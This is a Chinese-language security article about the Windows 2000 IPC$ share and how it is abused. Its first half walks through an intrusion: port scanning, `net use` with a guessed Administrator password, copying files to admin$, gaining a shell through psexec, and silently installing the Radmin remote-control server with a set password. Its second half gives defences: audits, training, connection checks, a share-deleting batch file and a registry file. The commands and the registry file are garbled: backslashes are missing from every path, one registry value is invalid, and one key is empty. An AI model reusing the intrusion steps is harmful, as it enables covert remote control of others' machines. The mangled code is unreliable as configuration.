網絡安全遵循木桶原理,即整個網絡環境中網絡安全的水平是由該網絡中防護水平最弱的計算機所決定的。在單位內部網絡中,大部分安全都是建立在基于“信任”的基礎上,而沒有采取安全防范方法,認為沒有誰會進行破壞,沒有誰會獲取情報信息。在這種環境下,遠程網絡連接安全是一個不容忽視的安全問題,值得進行探討。
什么是IPC
IPC是Internet Process Connection的縮寫,也就是遠程網絡連接。它是Windows NT及Windows 2000特有的一項功能。IPC是Windows的一個重要模塊,網上鄰居以及網絡共享都是通過IPC來實現的。黑客或者入侵者利用IPC$共享來實現入侵。網絡上也常常將利用IPC$來實現入侵,稱為IPC$漏洞。IPC$連接分為IPC$空連接和帶有一定權限IPC$連接,IPC$空連接沒有任何權限,但是可以獲取該主機的netbios信息;而帶有權限的IPC$連接則可以執行命令和對文件進行復制、刪除和修改等操作,從安全的角度來說,IPC$是一個存在安全隱患的因素。
IPC$入侵原理
IPC$入侵的最主要原理就是獲取被入侵主機的密碼,利用有權限的IPC$連接到主機并復制文件到主機上,然后運行木馬程序或者執行命令來實現完全控制。如果系統默認共享全部打開,通過字典軟件生成用戶口令密碼,再利用某些軟件進行用戶登錄密碼的暴力猜解,獲取用戶密碼只是時間問題。因此網絡遠程連接(IPC)安全是網絡安全中一個不容忽視的問題。
常見IPC漏洞攻擊方法
1.利用IPC漏洞應具備的條件
(1)知道賬號和口令,且賬號的權限必須是System以上,本系統中使用是Administator權限。在絕大多數環境中,利用軟件所掃描出來的弱口令一般都是管理員(Administrator)權限,如圖1所示。
![]("/news/Chanel/images/1144638723.jpg")
(2)系統沒有禁用遠程IPC$連接
(3)能夠掃描到對方計算機上所開放的445、135或者139端口
2.試驗
(1)試驗環境
◆ Windows 2000 Professional +SP4虛擬機
◆ 系統未安裝殺毒軟件和防火墻
◆ 目標機IP地址為192.168.1.4
◆ 遠程控制文件R_server.exe、raddrv.dll、AdmDll.dll。除了Radmin以外還有其他的遠程控制軟件也可以使用。
(2)探測目標機開放端口
◆ 使用sfind工具。使用命令格式為sfind -p 192.168.1.4
◆ 使用NT自動攻擊工具
(3)獲取目標機管理員賬號和密碼
(4)執行命令
net use \192.168.1.4ipc$ "123456" /user:"Administrator"
copy *.* \192.168.1. 4admin$ 其中*.*包含所有的控制文件。
psexec \192.168.1.4 cmd
通過命令行方式安裝R_Server。直接在psexec中執行以下命令:
netstat -an |find "4899"
regsrc.exe/pass:lovemeloveyou/port:4899/save/silence
regsrc.exe /install /silence
net start r_server
netstat -an |find "4899"
執行結果表示Radmin遠程控制軟件服務端安裝成功,然后通過radmin客戶端可以直接對該計算機實施遠程控制。
安全防范方法
1.管理層次防范方法
在網絡管理中常流行一句話“三分技術,七分管理”。其實在網絡安全中也是“三分技術,七分管理”,安全重在管理。只有意識上的重視才能帶來長久的安全。
(1)安全審計
密碼的安全是整個網絡安全中的一個重要因素,因此應從審計的角度加強管理,可以對系統是否安裝殺毒軟件、防火墻軟件、安裝系統補丁、系統設置密碼等方面進行安全審計,并配置一個安全管理人員。
(2)安全知識培訓
網絡安全也是一門技術,它由很多知識構成。因此了解和實施需要一個過程,這個過程就是培訓和教育。通過培訓來提高安全意識和安全技能,通過知識和法律教育來普及計算安全知識和計算機犯罪方面的法律意識和責任,增強安全感和責任感。
2.技術層次防范方法
(1)查看網絡連接情況
使用“netstat -an”查看本機與網絡的連接情況。該命令可以查看目前所建立的連接,系統所開放的服務端口。
(2)查看IPC$連接情況
使用“net use”命令查看網絡共享連接情況,如果顯示結果是“清單是空的”則表示無IPC$連接。否則會顯示連接的的詳細信息。
(3)安裝防火墻軟件
(4)關閉掉缺省共享
關閉缺省共享有兩種方式,一種是徹底的禁用共享,一種是開機后刪除共享。
開機后刪除共享,可以將如下代碼復制到記事本,然后將其另存為delshare.bat文件,并將其添加到系統的啟動中,這樣系統啟動后就會自動刪除默認共享。
net share admin$ /del
net share ipc$ /del
net share c /del
net share d /del
net share e /del
徹底刪除共享,可以直接將以下代碼復制到文本文件,并保存為delshare.reg文件,然后自己雙擊該文件將其導入注冊表即可。
REGEDIT4
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices lanmanserverparameters]
"AutoShareServer"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesTcpip Parameters]
"DefaultTTL"= 0-0xff
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesl anmanserverparameters]
"AutoshareWks"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetControlLsa]
(5)禁止Schedule服務
直接在“開始”-“運行”中輸入“services.msc”,在服務控制面板中停止掉
本文通過對IPC$入侵方法的分析和研究,提出了技術層次和管理層次的防范。通過以上的分析,可以看出IPC的安全是一個不容忽視的安全問題,因此進行網絡遠程連接的安全防范是非常必須的。
